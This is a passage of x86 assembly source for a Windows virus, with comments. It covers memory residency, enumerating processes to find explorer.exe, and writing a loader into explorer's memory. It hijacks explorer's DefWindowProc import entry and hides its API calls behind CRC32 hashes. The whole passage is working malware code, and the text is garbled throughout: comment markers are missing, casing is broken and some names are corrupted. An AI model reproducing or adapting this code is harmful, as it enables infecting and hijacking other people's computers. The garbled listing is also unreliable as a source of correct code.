All processes That Use it close their handles to it by using
The closehandle function. "
;
So the idea is to use createfilemapping and mapviewoffile,
; INSTEAD OF Virtualaloc ... The Read Open this
File-maping from a sales of code inject Into
Explorer.exe
; ================================================== =========== LEA EAX, DWORD PTR [EBP SZOBJECTNAME]
Push EAX
Push alloc_size
Push 00000000H
Push Page_Readwrite
Push 00000000H
Push 0FFFFFFFH
Call DWORD PTR [EBP A_CREATEFILEMAPPINGA]
OR EAX, EAX
JZ GOBACK2HOST
Mov Edi, EAX
Call DWORD PTR [EBP A_GETLASTERROR]
CMP EAX, 000000B7H; Error_Already_exists
Jne Rescheckok
Push EDI
Call DWORD PTR [EBP A_CLOSEHANDLE]
JMP GOBACK2HOST
Rescheckok: Push 00000000H
Push 00000000H
Push 00000000H
Push file_map_write
Push EDI
Call DWORD PTR [EBP A_MAPVIEWOFFILE]
OR EAX, EAX
JZ GOBACK2HOST
; ================================================== ===========
; Copy Virus to Allocated Memory Block
; ================================================== ===========
Lea ESI, DWORD PTR [EBP VIRO_SYS]
Mov Edi, EAX
MOV ECX, SIZE_VIRTUAL
CLD
REP MOVSB
; ================================================== ===========; Continue Execution On Allocated Memory !!!!!!!!!
;
; This means we areplay ...
; ================================================== ===========
Add Eax, Offset Hostvirmem - Offset Viro_Sys
Push EAX
RET
; ================================================== ===========================
Code Executed Into Allocated Memory ... Extended Buffers Are Available Now
; ================================================== ===========================
Hostvirmem: Call Memdelta
MEMDELTA: POP EBP
Sub EBP, Offset Memdelta
; ================================================== ===========; The Virus Needs to Locate System Directory in Order To Load
Dll's by using crc32 instead of their names
; ================================================== ===========
PUSH MAX_PATH
Lea EDI, DWORD PTR [EBP SZSYSTEMDIR]
Push EDI
Call DWORD PTR [EBP A_GETSYSTEMDIRECTORYA]
OR EAX, EAX
JZ GOBACK2HOST
EDI -> Points 1byte Above the Null Terminator
Add Edi, EAX
CLD
MOV EAX, 'D. * /'; add '* .dll'
Stosd
MOV EAX, 00004C4CH
Stosd
; ================================================== ===========
Get OS Version
; ================================================== ===========
Lea ESI, DWORD PTR [EBP SYSTEM_VERSION]
PUSH ESI
MOV DWORD PTR [ESI], 00000094H
Call DWORD PTR [EBP A_GETVERSIONEX] OR EAX, EAX
JZ FreeUser32
Add esi, 00000010H
CLD
Lodsd
CMP EAX, VER_PLATFORM_WIN32_NT
JE Meminfectwinnt
CMP EAX, VER_PLATFORM_WIN32_WINDOWS
JE MeminfectWin9x
; ================================================== ===========
Free USER32
; ================================================== ===========
FreeUser32: Push DWORD PTR [EBP HUSER32]
Call DWORD PTR [EBP A_FREELIBRARY]
; ================================================== ===========
; Back to Host
; ================================================== ===========
TBLDOPOLYPOPS EQU $
GOBACK2HOST: POP EAX
POP EAX
POP EAX
POP EAX
RET
; ================================================== ===========================; Residency Routines for Windows 9X
; ================================================== ===========================
; ================================================== ===========
Get Hands on User32.dll
; ================================================== ===========
MEMINFECTWIN9X: MOV EAX, DWORD PTR [EBP CRCSZUSER32]
Mov ECX, Numuser32APIS
LEA ESI, DWORD PTR [EBP CRC32USER32APISW9X]
Lea EDI, DWORD PTR [EBP EPUSER32APIS]
Call virloadlib
MOV DWORD PTR [EBP HUSER32], EAX
OR EAX, EAX
JZ GOBACK2HOST
; ================================================== ===========; the functions provided by the Tool Help Library Make IT
Easier for you to obtain information about currently
Executing Applications. Thase Functions Are Designed To
Streamline The Creation of Win32-Hosted Tools, Specifically
Debuggers
; ================================================== ===========
MOV EBX, DWORD PTR [EBP HKERNEL32]
MOV ECX, NumToolhelPapis
Lea ESI, DWORD PTR [EBP CRC32TOOL HPAPIPAPIS]
Lea EDI, DWORD PTR [EBP EPTOOLHELPAPIPIPIS]
Call get_apis
JECXZ DONETOOLHELP
ExitMemWin9x: JMP freeuser32
; ================================================== ===========
Take a Snapshot of the processsess currently loaded in the
; SYSTEM
;
The snapshot taken by createtoolhelpsnapshot function is
Examined by the other Tool Help functions to provide their
Results
;
Access to the Snapshot Is Read Only. The Snapshot Handle
ACTS LIKE An Object Handle and Is Subject To The Same Rules
Regarding which processes and threads it is valid in; ======================================= =====================
TH32CS_SNAPHEAPLIST EQU 00000001H
TH32CS_SNAPPROCESS EQU 00000002H
TH32CS_SNAPTHREAD EQU 00000004H
TH32CS_SNAPMODULE EQU 00000008H
TH32CS_INHERIT EQU 80000000H
TH32CS_SNAPALL EQU TH32CS_SNAPHEAPLIST OR /
TH32CS_SNAPPROCESS OR /
TH32CS_SNAPTHREAD OR /
TH32CS_SNAPMODULE
DONETOOLHELP: PUSH ECX; TH32PROCESSID
Push TH32CS_SNAPPROCESS; DWFLAGS
Call DWORD PTR [EBP A_CREATOOLHELP32SNAPSHOT]
CMP EAX, 0FFFFFFFH
JE EXITMEMWIN9X
MOV DWORD PTR [EBP HSNAPSHOT], EAX
; ================================================== ===========
; Retrieve Information About The First Process Encountered
; in the system snapshot
; ================================================== ===========
Lea EDI, DWORD PTR [EBP Processentry]
Push EDI
MOV DWORD PTR [EDI], SizeOfProcessentry
Push EAX
Call DWORD PTR [EBP A_PROCESS32FIRST]
OR EAX, EAX
JZ CloseNapshot
CheckProcentry: Lea ESI, DWORD PTR [EBP Proceszexefile] Lea EDI, DWORD PTR [EBP BUFSTRFILENAME]
Call parse_filename
MOV ESI, EDX
Call get_str_crc32
CMP EDX, DWORD PTR [EBP CRCSZEXPLOR]; is Explorer.exe?
Je EfoundTrymod
; ================================================== ===========
Go to Next Process
; ================================================== ===========
Lea Eax, DWORD PTR [EBP Processentry]
Push Eax; LPPE
Push DWORD PTR [EBP HSNAPSHOT]; HSNAPSHOT
Call DWORD PTR [EBP A_PROCESS32NEXT]
OR EAX, EAX
JNZ CheckProcentry
CloseSnapshot: Push DWORD PTR [EBP HSNAPSHOT]
Call DWORD PTR [EBP A_CLOSEHANDLE]
JMP exitmemwin9x
; ================================================== ===========
Close Snapshot and Create A New One, But this Time We Are
Going to List Modules Loaded by Explorer.exe
; ================================================== =========== EfoundTrymod: Push DWORD PTR [EBP HSNAPSHOT]
Call DWORD PTR [EBP A_CLOSEHANDLE]
Push DWORD PTR [EBP Proceth32Processid]; TH32Processid
Push TH32CS_SNAPModule; DWFLAGS
Call DWORD PTR [EBP A_CREATOOLHELP32SNAPSHOT]
CMP EAX, 0FFFFFFFH
JE EXITMEMWIN9X
MOV DWORD PTR [EBP HSNAPSHOT], EAX
; ================================================== ===========
: Perfect !!!! Lets Retrieve 1st Module Using Module32First
; ================================================== ===========
Lea EDI, DWORD PTR [EBP ModuleEntry]
Push EDI; LPME
MOV DWORD PTR [EDI], SizeOfmoduleEntry
Push Eax; hsnapshot
Call DWORD PTR [EBP A_MODULE32FIRST]
OR EAX, EAX
JZ CloseNapshot
; ================================================== ===========; Check if this is the module we are intended in
; ================================================== ===========
Checkemod: MOV Eax, DWORD PTR [EBP Proceth32Module]
CMP EAX, DWORD PTR [EBP MODETH32MODULEID]
Je getModdone
; ================================================== ===========
Go to Next Module
; ================================================== ===========
Push EDI; LPME
Push DWORD PTR [EBP HSNAPSHOT]; HSNAPSHOT
Call DWORD PTR [EBP A_MODULE32NEXT]
OR EAX, EAX
JNZ Checkemod
JMP CloseNapshot; Abortiff If Module Not Found
; ================================================== ============ hj0j0 ... Fine! Here WE Are Weth Explorer.exe Module Handle
; ================================================== ===========
GetModdone: MOV EDX, DWORD PTR [EBP MODEHMODULE]
MOV DWORD PTR [EBP HMODULE], EDX
; ================================================== ===========
; Open Process
; ================================================== ===========
MOV EAX, DWORD PTR [EBP Proceth32Processid]
Call OpenProcess
OR EAX, EAX
JZ CloseNapshot
; ================================================== ===========; duh! Explorer.exe Process is now 0wn3d
; ================================================== ===========
Call Fuckexplorer
; ================================================== ===========
Close Process
; ================================================== ===========
Push DWORD PTR [EBP HPROCESS]
Call DWORD PTR [EBP A_CLOSEHANDLE]
JMP CloseNapshot
; ================================================== ===========================; Residency Routines for Windows NT & window 2000
; ================================================== ===========================
; ================================================== ===========
; Hands On User32 APIS for Windows NT (Use Wide Versions)
; ================================================== ===========
MEMINFECTWINNT: MOV EAX, DWORD PTR [EBP CRCSZUSER32]
Mov ECX, Numuser32APIS
LEA ESI, DWORD PTR [EBP CRC32USER32APISWNT]
Lea EDI, DWORD PTR [EBP EPUSER32APIS]
Call virloadlib
MOV DWORD PTR [EBP HUSER32], EAX
OR EAX, EAX
JZ GOBACK2HOST
; ================================================== ===========; We need psapi.dll to do the trick
; ================================================== ===========
MOV EAX, DWORD PTR [EBP CRCSZPSAPI]
MOV ECX, Numpsapiapis
Lea ESI, DWORD PTR [EBP CRC32PSAPIAPIAPIAPIAPIAPIS]
Lea EDI, DWORD PTR [EBP EPPSAPIAPIAPIS]
Call virloadlib
MOV DWORD PTR [EBP HPSAPI], EAX
OR EAX, EAX
JZ FreeUser32
; ================================================== ===========
Get a list of loaded processes (max. 32 processes)
; ================================================== ===========
DONEPSAPI: Lea EDI, DWORD PTR [EBP EP_BYTES]]
Push edi; cbeseded
PUSH 00000080H; CB
Lea ESI, DWORD PTR [EBP ProcessidList]
PUSH ESI
Call DWORD PTR [EBP A_ENUMPROCESSESSSESSS]]
OR EAX, EAX
JZ EXITMEMNT
; ================================================== ===========; To Determine How Many Processes Were Enumerated by The Call
t ENUMPROCESS, DIVIDE The Resulting Value in the cbeseded
Parameter by Sizeof (DWORD)
; ================================================== ===========
MOV ECX, DWORD PTR [EDI]
SHR ECX, 02H; Divide ECX BY 4 ... Nice, ISNT IT?
Jecxz ExitMemnt
; ================================================== ===========
Now We Have A List of Process Identifiers ... FOLLOW IT
; ================================================== ===========
ProcessLookup: Push ECX
CLD
Lodsd
PUSH ESI
; ================================================== ===========; Open Process
; ================================================== ===========
Call OpenProcess
OR EAX, EAX
JZ TrynextProcess
; ================================================== ===========
ENUMERATE Process Modules ... The 1st Obtained Module
Is The Executable Itself
; ================================================== ===========
LEA EDX, DWORD PTR [EBP EP_BYTES]; LPCBNEEDED
Push Edx
PUSH 00000080H; CB
Lea ESI, DWORD PTR [EBP MODULIST]
Push ESI; LPHMODULE
Push eax; hprocess
Call DWORD PTR [EBP A_ENUMPROCESSMODULES]]
OR EAX, EAX
JZ NcProcess
CLD
Lodsd; the first module is the .exe itself
MOV DWORD PTR [EBP HMODULE], EAX
; ================================================== ===========; Get Module Name Using GetModuleBaseNamea API
; ================================================== ===========
Push max_path; nsize
Lea ESI, DWORD PTR [EBP BUFSTRFILENAME]
Push ESI; LPBASENAME
Push eax; hmodule
Push DWORD PTR [EBP HPROCESS]; HPROCESS
Call DWORD PTR [EBP A_GETMODULEBASENAMEA]
OR EAX, EAX
JZ NcProcess
; ================================================== ===========
Module Name Is Explorer.exe (Use CRC32 Comparison)
; ================================================== ===========
Mov EDI, ESI
Call parse_filename
MOV ESI, EDX
Call get_str_crc32
CMP EDX, DWORD PTR [EBP CRCSZEXPLOR]; is Explorer.exe?
JNE NCPROCESS
; ================================================== ===========; if Explorer.exe Found Cleanup and Go to the MEMORY
Infection Procedure
; ================================================== ===========
POP EAX
POP EAX
Call Fuckexplorer
; ================================================== ===========
Close Process
; ================================================== ===========
Push DWORD PTR [EBP HPROCESS]
Call DWORD PTR [EBP A_CLOSEHANDLE]
JMP ExitMemnt
; ================================================== ===========
; Next process
; ================================================== ===========
NcProcess: Push DWORD PTR [EBP HPROCESS]
Call DWORD PTR [EBP A_CLOSEHANDLE]
TrynextProcess: POP ESI
POP ECX
Loop ProcessLookup
; ================================================== ===========
Residency Proc Failed!
; ================================================== ===========
ExitMEMNT: Push DWORD PTR [EBP HPSAPI]
Call DWORD PTR [EBP A_FREELIBRARY]
JMP freeuser32
; ================================================== ===========================
; Open Process
;
On Entry:
EAX -> Process ID
ON EXIT:
EAX -> Handle to Process or Null IF Error
; ================================================== =================================== process_Terminate EQU 00000001H
Process_create_thread EQU 00000002H
Process_set_sessionid EQU 00000004H
Process_vm_operation equ 00000008H
Process_vm_read equ 00000010H
Process_vm_write equ 00000020H
Process_dup_handle EQU 00000040h
Process_create_process EQU 00000080H
Process_set_quota EQU 00000100H
Process_set_information EQU 00000200H
Process_query_information EQU 00000400H
OpenProcess: Push Eax
Push 00000000H
Push Process_Query_information or /
Process_vm_read or /
Process_vm_write or /
Process_vm_operation
Call DWORD PTR [EBP A_OpenProcess]
MOV DWORD PTR [EBP HPROCESS], EAX
RET
; ================================================== ===========================
; Infect Explorer.exe in Memory
; ================================================== ===========================; ===================================================================================================================================================== =======================================
Now Search for the section Header List
; ================================================== ===========
FuckExplorer: Mov EBX, DWORD PTR [EBP HMODULE]
MOV ECX, 00000004H
Lea ESI, DWORD PTR [EBP EXPLORER_MZ_LFANEW]
MOV EAX, EBX
Add Eax, MZ_LFANew
Call ReadProcessmem
OR EAX, EAX
JZ Fe_exit
Lodsd; there is a cld at the end of readprocessmem
OR EAX, ESI -> Explorer_fh_sizeofoptionalheader
JZ Fe_exit
EAX -> MZ_LFANEW
Add Eax, EBX
Mov Edi, EAX
Add Eax, 00000004H FH_SIZEOFOPTIONALHEADER
Dec ECX
Dec ECX
Call ReadProcessmem
OR EAX, EAX
JZ Fe_exit
Lodsw; Just to do
ESI -> Explorer_fh_numberofsections
Mov Eax, EDI
Add Eax, 00000004H FH_NUMBEROFSECTIONS
Call ReadProcessmem
OR EAX, EAX
JZ Fe_exit
Lodsw; ESI -> Explorer_sectionHeader
Movzx ECX, AX; ECX -> Number of SectionsMovzx Eax, Word PTR [EBP Explorer_fh_sizeofoptionalheader]
Add Edi, EAX
Add EDI, 00000004H Image_SizeOf_File_Header
; ================================================== ===========
Search for a Suitable Section
; ================================================== ===========
Explorerhole: Push ECX
Mov Eax, EDI
MOV ECX, Image_SizeOf_SECTION_HEADER
Call ReadProcessmem
OR EAX, EAX
JZ E_NEXTSECTION
; ================================================== ===========
Is this a valid section?
; ================================================== ===========
CMP DWORD PTR [ESI SH_CHARACTERISTICS], /
Image_scn_mem_read or /
Image_scn_mem_write or /
Image_scn_cnt_initialized_data
JNE E_NEXTSECTION
MOV EAX, DWORD PTR [ESI SH_SIZEOFRAWDATA] SUB EAX, DWORD PTR [ESI SH_VIRTUALSIZE]
JS E_NEXTSECTION
CMP Eax, SizeOf_evl
JAE OK_E_SECTION
; ================================================== ===========
; Next section
; ================================================== ===========
E_NEXTSECTION: Add Edi, ECX
POP ECX
Loop Explorerhole
; ================================================== ===========
No Suitable Section Found
; ================================================== ===========
JMP fe_exit
; ================================================== ===========; Yes, this is a valid section ... Write Virus Loader
; ================================================== ===========
OK_E_SECTION: POP ECX; Cleanup Stack
MOV EAX, DWORD PTR [EBP A_DEFWINDOWPROC]
MOV DWORD PTR [EBP EVL_A_ORGINALAPIADDDR], EAX
MOV EAX, DWORD PTR [EBP A_OPENFILEMAPPINGA]
MOV DWORD PTR [EBP EVL_A_OPENFILEMAPPING], EAX
MOV EAX, DWORD PTR [EBP A_MAPVIEWOFFILE]
MOV DWORD PTR [EBP EVL_A_MAPVIEWOFFILE], EAX
MOV EAX, EBX
Add Eax, DWORD PTR [ESI SH_VIRTUALADDRESS]
Add Eax, DWORD PTR [ESI SH_VIRTUALSIZE]
MOV DWORD PTR [EBP Explorer_patch], EAX
Mov ECX, SIZEOF_EVL
LEA ESI, DWORD PTR [EBP EVL_CODE]
Call WriteProcessmem
OR EAX, EAX
JZ Fe_exit
; ================================================== ===========
Go to Explorer.exe Data Directory
; ================================================== =========== Mov EAX, EBX
Add Eax, DWORD PTR [EBP EXPLORER_MZ_LFANEW]
Add Eax, 00000004H /
Image_sizeof_file_header /
Oh_dataDirectory.de_import.dd_virtualaddress
MOV ECX, 00000004H
Lea ESI, DWORD PTR [EBP Explorer_de_import]
Call ReadProcessmem
OR EAX, EAX
JZ Fe_exit
; ================================================== ===========
; Search for User32 Import Module Descriptor
; ================================================== ===========
Lodsd
Add Eax, EBX
Mov Edi, EAX
E_Search_K32: Mov Eax, EDI
MOV ECX, Image_SizeOf_import_descriptor
Lea ESI, DWORD PTR [EBP Explorer_importDescriptor]
Call ReadProcessmem
OR EAX, EAX
JZ Fe_exit
; ================================================== ===========
Last Import Module Descriptor!?; ============================================= ==================
CMP DWORD PTR [ESI], 00000000H
JE Fe_exit
; ================================================== ===========
Check Import Module Descriptor ID_NAME
; ================================================== ===========
MOV EAX, EBX
Add Eax, DWORD PTR [ESI ID_NAME]
MOV ECX, 00000010H
Lea ESI, DWORD PTR [EBP EXPLORER_ID_NAME]
Call ReadProcessmem
OR EAX, EAX
JZ Fe_exit
Push EDI
Lea EDI, DWORD PTR [EBP BUFSTRFILENAME]
Call parse_filename
MOV ESI, EDX
Call get_str_crc32
POP EDI
CMP EDX, DWORD PTR [EBP CRCSZUSER32]; Is User32.dll?
JE E_FOUND_K32
; ================================================== ===========
Next import module descriptor
; ================================================== =========== Add Edi, Image_SizeOf_Import_Descriptor
JMP E_SEARCH_K32
; ================================================== ===========
User32.dll Import Module Descriptor Found
; ================================================== ===========
E_FOUND_K32: MOV EDI, DWORD PTR [EBP /
Explorer_importDescriptor /
ID_Firstthunk]
Add Edi, EBX
MOV ECX, 00000004H
Lea ESI, DWORD PTR [EBP Explorer_HOOK]
E_NEXTTHUNK: MOV EAX, EDI
Call ReadProcessmem
OR EAX, EAX
JZ Fe_exit
MOV EAX, DWORD PTR [ESI]
OR EAX, EAX
JZ Fe_exit
CMP EAX, DWORD PTR [EBP A_DEFWINDOWPROC]
JE E_POISON
Add Edi, ECX
JMP E_NEXTTHUNK
; ================================================== ===========
Gotcha!
; ================================================== =========== E_Poison: Mov Eax, EDI
MOV DWORD PTR [EBP Explorer_init_hook], EAX
LEA ESI, DWORD PTR [EBP Explorer_patch]
Call writeprocessmem; ECX Already loaded
OR EAX, EAX
JZ Fe_exit
; ================================================== ===========
; Done !!!! ieieie !!!!
; ================================================== ===========
Fe_exit: Ret
; ================================================== ===========================
Code Injected Into Explorer.exe
;
The purpose of this code is to get access to virus memory from explorer.exe
; ================================================== =========================== EVL_CODE EQU $
; ================================================== ===========
; Let Some Space for the Return Address ... Then Save All Regs
; ================================================== ===========
Push EAX
Pushhad
; ================================================== ===========
This is The Original Address of the Api ... Lets make the
Return Address Point To IT
; ================================================== =========== DB 0B8H; EAX -> Original API Address
EVL_A_ORGINALAPIADDR DD 00000000H
MOV DWORD PTR [ESP CPUSHAD], EAX
; ================================================== ===========
; Attempt to Avoid Reentrance Problems
; ================================================== ===========
Call Multithreadsafe
DB 00H; ONLY CHANGED OVER HOOK CODE, NOT OVER Main Virus Body
Multithreadsafe: POP ESI
Mov EDI, ESI
CLD
Lodsb
OR Al, Al
JNZ MaybeonnextCall
Dec Al
Stosb
; ================================================== ===========
Try to open the virus file-mapping
;
There is some kinda race condition here ... if the infected
PROGRAM TERMINATES BEFORE THIS POINT WE WONT Be Able To
Find the rest of the virus in memory ...
;
; In That Case The Hook Will Stay Present, and this code may; becoming on Next Attemps
; ================================================== ===========
Call getszobjname; lpname
SzobjectName DB 10h DUP (00h)
Getszobjname: Push 00000000H; BinheritHandle
Mov Edi, File_Map_write
Push EDI; DWDESIREDACCESS
DB 0B8H; EAX -> OpenFilemappinga
EVL_A_OPENFILEMAPPING DD 00000000H
Call EAX
OR EAX, EAX
JZ MaybeonnextCall
; ================================================== ===========
The file-mapping is here ... Get An Image of IT
; ================================================== ===========
XOR EDX, EDX
Push Edx
Push Edx
Push Edx
Push EDI
Push EAX
DB 0B8H; EAX -> OpenFilemappinga
EVL_A_MAPVIEWOFFILE DD 00000000H
Call EAX
OR EAX, EAX
JZ MaybeonnextCall
; ================================================== ===========; Great! WE Have Access to Virus Allocated Memory, But
; Remember Weave INSIDE EXPLORER.EXE !!!!
;
; Jump to Virus Complete Image In Order to Complete
Initialization INSIDE Explorer.exe
; ================================================== ===========
Add Eax, Offset Explorerinit - Offset Viro_Sys
Call EAX
; ================================================== ===========
Restore Regs and Jump To Original API Code
; ================================================== ===========
MaybeonnextCall: Popad
RET
Sizeof_evl EQU $-EVL_CODE
; ================================================== ===========================; Read Process Memory Routine
;
On Entry:
EAX -> Pointer to the base address from which to read
; ECX -> Specifies the Requested Number of bytes To Read
ESI -> Pointer TO A Buffer That Receives The Contents from
; the address address
;
[EBP HPROCESS] Contains The Target Process Handle
;
ON EXIT:
EAX -> null if error
;
; EBX, ECX, ESI, EDI, EBP PRESERVED
; ================================================== ===========================
ReadProcessMem: Push EDI
Push ECX
Lea EDI, DWORD PTR [EBP EP_BYTES]; LPNUMBEROFBYTESREAD
Push EDI
Push ECX; nsize
Push ESI; LPBUFFER
Push Eax; lpbaseaddress
Push DWORD PTR [EBP HPROCESS]; HPROCESS
Call DWORD PTR [EBP A_READPROCESSMEMORY]
POP ECX
OR EAX, EAX
JZ EXITREM
CMP DWORD PTR [EDI], ECX
JE EXITREM
XOR EAX, EAX
EXITREM: POP EDI
CLD
RET
; ================================================== ===========================; Write Process Memory Routine
;
On Entry:
EAX -> Pointer to the base address in the specified process
To Which Data Will Be Written
; ECX -> Specifies the number of bytes to write
ESI -> Pointer to the buffer That Contains Data To Be Written
;
[EBP HPROCESS] Contains The Target Process Handle
;
ON EXIT:
EAX -> null if error
;
; EBX, ECX, ESI, EDI, EBP PRESERVED
; ================================================== ===========================
WriteProcessmem: Push EDI
Push ECX
LEA EDI, DWORD PTR [EBP EP_BYTES]; lpnumberofbyteswritten
Push EDI
Push ECX; nsize
Push ESI; LPBUFFER
Push Eax; lpbaseaddress
Push DWORD PTR [EBP HPROCESS]; HPROCESS
Call DWORD PTR [EBP A_WRITEPROCESSMORY]
POP ECX
OR EAX, EAX
JZ EXITWEM
CMP DWORD PTR [EDI], ECX
JE EXITWEM
XOR EAX, EAX
Exitwem: POP EDI
CLD
RET
; ================================================== ===========================; Make CRC look Table
;
Generate a Table for A Byte-Wise 32-Bit CRC Calculation On The Polynomial:
; x ^ 32 x ^ 26 x ^ 23 x ^ 22 x ^ 16 X ^ 12 X ^ 11 X ^ 10 X ^ 8 X ^ 7 X ^ 5 X ^ 4 X ^ 2 x 1.
;
Polynomials over GF (2) Are Represented in Binary, One Bit Per Coefficient,
WITH THE LOWEST POWERS in The Most Significant Bit. Then Adding Polynomials
Is Just Exclusive-or, And Multiplying a Polynomial by x Is a right shift by
; one. if we call the Above Polynomial P, And Repesent a byte as the
Polynomial Q, Also with the Lowest Power in The Most Significant Bit (So the Most)
; BYTE 0XB1 IS THE POLYNOMIAL X ^ 7 X ^ 3 X 1), THEN THE CRC IS (q * x ^ 32) MOD P,
WHERE A Mod B Means The Remainder After Dividing A By B.
;
This Calculation IS DONE Using The Shift-Register Method of Multiplying and
Taking the remainder. The register is initialized to zero, and for each
; incoming bit, x ^ 32 is added mod p to the register if the bit is a one (Where
; x ^ 32 MOD P IS P x ^ 32 = x ^ 26 ... 1), and the register is multiplied mod p by
; x (Which is shifting right by one and adding x ^ 32 mod p if the bit shifted
Out is a one). We Start with the highest power (Least Significant Bit) of
Q And Repeat for All Eight Bits of q.
;
The Table IS SIMPLY THE CRC of All Possible Eight Bit Values. This is all
................... ..
;
Original C C code by Mark Adler
Translated to asm for win32 by griyo
; ================================================== ===========================
Make_Crc_TBL:
; ================================================== ===========================
Make Exclusive-or Pattern from Polynomial (0edb88320h)
;
The Following Comment Code Is An Example of How To
Make The Exclusive-or Pattern from Polynomial
At runtime
;
; xor Edx, EDX
; MOV ECX, 0000000EH
Lea EBX, DWORD PTR [EBP TBL_TERMS]
; Calc_Poly: MOV EAX, ECX
; xlatb
Sub eax, 0000001FH
Neg EAX
; BTS EDX, EAX
Loop Calc_Poly
;
Edx Contains now the Exclusive-or Pattern
;
The Polynomial IS:
;
; X ^ 32 x ^ 26 x ^ 23 x ^ 22 x ^ 16 X ^ 12 X ^ 11 X ^ 10 X ^ 8 X ^ 7 X ^ 5 X ^ 4 X ^ 2 x ^ 1 x ^ 0
;
TBL_TERMS DB 0, 1, 2, 4, 5, 7, 8, 10, 11, 12, 16, 22, 23, 26
;
; ================================================== =========================== CLD
MOV ECX, 00000100H
Lea EDI, DWORD PTR [EBP TBL_CRC32]
CRC_TBL_DO: MOV EAX, 000000FFH
Sub Eax, ECX
Push ECX
MOV ECX, 00000008H
Make_Crc_Value: SHR EAX, 01H
JNC Next_Value
xor eax, 0edb88320h
Next_Value: loop make_crc_value
POP ECX
Stosd
LOOP CRC_TBL_DO
RET
; ================================================== ===========================
RETURN A 32bit CRC of the Contents of the Buffer
;
On Entry:
ESI -> PTR TO BUFFER
; ECX -> Buffer Size
ON EXIT:
; EDX -> 32bit CRC
; ================================================== ===========================
GET_CRC32: CLD
Push EDI
XOR EDX, EDX
Lea EDI, DWORD PTR [EBP TBL_CRC32]
CRC_CALC: PUSH ECX
Lodsb
XOR EAX, EDX
And Eax, 000000FFH
SHR EDX, 08H
XOR EDX, DWORD PTR [EDI EAX] POP ECX
Loop CRC_CALC
POP EDI
RET
; ================================================== ===========================
; Get a 32bit CRC of a null Terminated Array
;
On Entry:
ESI-> Ptr to string
EXIT:
; EDX -> 32bit CRC
; ================================================== ===========================
GET_STR_CRC32: CLD
Push ECX
Push EDI
Mov EDI, ESI
XOR EAX, EAX
MOV ECX, EAX
CRC_SZ: INC ECX
Scasb
JNZ CRC_SZ
Call get_crc32
POP EDI
POP ECX
RET
; ================================================== ===========================
Get the entry-points of getprocaddress
;
On Entry:
EBX -> kernell32 base address
ON EXIT:
; ECX -> Address of getProcaddress
; ================================================== =========================== GetgetProcaddr: CLD
MOV EAX, DWORD PTR [EBX Image_DOS_HEADER.MZ_LFANEW]
MOV EDX, DWORD PTR [EAX /
EBX /
NT_OPTIONALHEADER. /
Oh_directoryEntries. /
DE_EXPORT. /
DD_VIRTUALADDRESS]
Add Edx, EBX
MOV ESI, DWORD PTR [EDX ED_ADDRESSOFNAMES]]
Add ESI, EBX
MOV EDI, DWORD PTR [EDX ED_ADDRESSOFNAMEORDINALS]
Add Edi, EBX
MOV ECX, DWORD PTR [EDX ED_NUMBEROFNAMES]]
Function_loop: Lodsd
Push Edx
PUSH ESI
Lea ESI, DWORD PTR [EAX EBX]; Get Ptr To API Name
Call get_str_crc32; get crc32 of api name
POP ESI
CMP EDX, DWORD PTR [EBP CRCGETPROCADDR]
JE API_FOUND
Inc EDI
Inc EDI
POP EDX
LOOP Function_LOOP
RET
API_FOUND: POP EDX
Movzx Eax, Word PTR [EDI]
SUB EAX, DWORD PTR [EDX ED_BASEORDINAL]
INC EAX
SHL EAX, 02H
MOV ESI, DWORD PTR [EDX ED_ADDRESSOFFUNCTIONS]
Add ESI, ESI
Add ESI, EBX
Lodsd
Lea ECX, DWORD PTR [EAX EBX]
RET
; ================================================== ===========================
Get the entry-point of each needed API
;
THIS ROUTINE Uses The CRC32 INSTEAD OF API Names
;
On Entry:
EBX -> Base Address Of DLL
; ECX -> Number of Apis in The Folling Buffer
ESI -> Buffer Filled with The CRC32 of Each API Name
EDI -> Recives Found API Addresses
ON EXIT:
; ECX -> IS 00000000h if everything was ok
; ================================================== ===========================
GET_APIS: CLD
GET_EACH_API: PUSH ECX
PUSH ESI
; ================================================== ===========
Get a Pointer to the Export Data
; ================================================== ===========
MOV EAX, DWORD PTR [EBX Image_DOS_HEADER.MZ_LFANEW]
MOV EDX, DWORD PTR [EAX /
EBX /
NT_OPTIONALHEADER. /
Oh_directoryEntries. /
DE_EXPORT. /
DD_VIRTUALADDRESS]
Add Edx, EBX
MOV ESI, DWORD PTR [EDX ED_ADDRESSOFNAMES]]
Add ESI, EBX
MOV ECX, DWORD PTR [EDX ED_NUMBEROFNAMES]]
; ================================================== ============; try to find an API Name That Matches Given CRC32
; ================================================== ===========
API_LOOP: LODSD
Push ESI; PTR to AddressofNames
Lea ESI, DWORD PTR [EAX EBX]
Push ESI; Save Ptr To API Name
Call get_str_crc32
MOV ESI, DWORD PTR [ESP 00000008H]
Lodsd
CMP EAX, EDX
JE CRC_API_FOND
POP Eax; Remove API Name from Stack
PTR to RVA for Next API Name
LOOP API_LOOP
GET_API_ERROR: POP ESI; PTR To CRC's of API Names
POP ECX; Number of API's
Ret; exit with error (ECX! = NULL)
; ================================================== ===========
The Ptr To Api Name Is Already on Stack, Now Push THE
Module Handle and Call GetProcaddress
; ================================================== =========== CRC_API_FOUND: PUSH EBX
Call DWORD PTR [EBP A_GETPROCADDRESS]
Cld; Dont Let the Api Call Change This THIS
Pop Edx; Remove Ptr To Rva for Next Name
OR EAX, EAX
JZ get_api_error; if getprocaddress returned null exit
STOSD; Save the API Address Into Given Table
PTR to CRC's of API Names
Lodsd
POP ECX
LOOP GET_EACH_API
RET
; ================================================== ===========================
Find base address of kernel32.dll
THANKS TO JACKY QWERTY for the SEH ROUTINES
; ================================================== ===========================
SEH_BLOCK_0000 MACRO
Add ESP, -CPUSHAD
JNZ GNTBA_L1
ENDM
IgetNTBaseAddr: @seh_setupframe
MOV ECX, EDX
XCHG AX, CX
GNTBA_L0: DEC CX
JZ GNTBA_L2
Add Eax, -10000H
Pushhad
MOV BX, -IMAGE_DOS_SIGNATURE
Add BX, Word PTR [EAX]
Mov ESI, EAXJNZ GNTBA_L1
MOV EBX, -IMAGE_NT_SIGNATURE
Add Eax, DWORD PTR [ESI.MZ_LFANEW]
Mov EDX, ESI
Add Ebx, DWORD PTR [EAX]
JNZ GNTBA_L1
Add Edx, [Eax.nt_OptionalHeader.oh_directoryEntries. /
DE_EXPORT.DD_VIRTUALADDRESS]
Add ESI, DWORD PTR [EDX.ED_NAME]
Lea EDI, DWORD PTR [EBP BUFSTRFILENAME]
Call parse_filename
MOV ESI, EDX
Call get_str_crc32
CMP EDX, DWORD PTR [EBP CRCKERNEL32]; Is Kernel32.dll?
JE K32_F
GNTBA_L1: POPAD
JMP GNTBA_L0
K32_F: POPAD
XCHG ECX, EAX
